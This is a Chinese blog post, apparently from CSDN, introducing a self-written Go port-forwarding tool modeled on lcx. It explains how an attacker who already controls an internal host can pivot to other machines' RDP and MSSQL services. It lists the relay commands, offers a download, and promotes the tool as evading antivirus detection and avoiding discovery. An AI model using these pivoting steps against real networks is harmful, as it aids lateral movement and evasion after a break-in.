内网打洞,类似于lcx 但是比他更加强大


       经常有朋友用lcx的,但是由于很多原因可能都不好使,例如 :

1.linux下能用lcx,有时只能拿msf出来。(golang的程序跨平台,甚至嵌入式linux都支持。)

2.不免杀  (基本上目前golang 语言不会被当病毒)

3.每次内网要从新连接其他主机时候,必须从进去从新敲打命令 ,操作过多任意被发现。(肉鸡只用操作一次,其他都交给主控端操作了)


最近正好都碰上了,于是自己写了一个。

运行如下:



现借下列场景展开介绍:



介绍:

以上IP拓扑如上,内网私有,外网无法直接访问内网任意主机,其中A已经控制了B。


目的:

攻击者A想通过B 连接内部任意计算机(如远程桌面,数据库)


要求:

攻击者A 已经控制B,并远程桌面内部其他机器C和其他机器。


操作:

首先, 在B上面敲打:

     lcx 111.13.100.92 123

其次剩下的都在A上敲打:

 假如 A 想连接内网 C 的远程桌面,在A上敲:lcx 456 123 192.168.10.3 3389

     这时候 A 只用连接本机的456端口就等于连接内网的3389了。


假如A 想还想连接内网其他机器的mssql (假设IP地址为192.168.10.55):

  这时候B不用管,只用在A上敲:lcx 1433 123 192.168.10.55 1433




暂时提供windows版本下载:

http://download.csdn.net/detail/yatere/8642431



评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值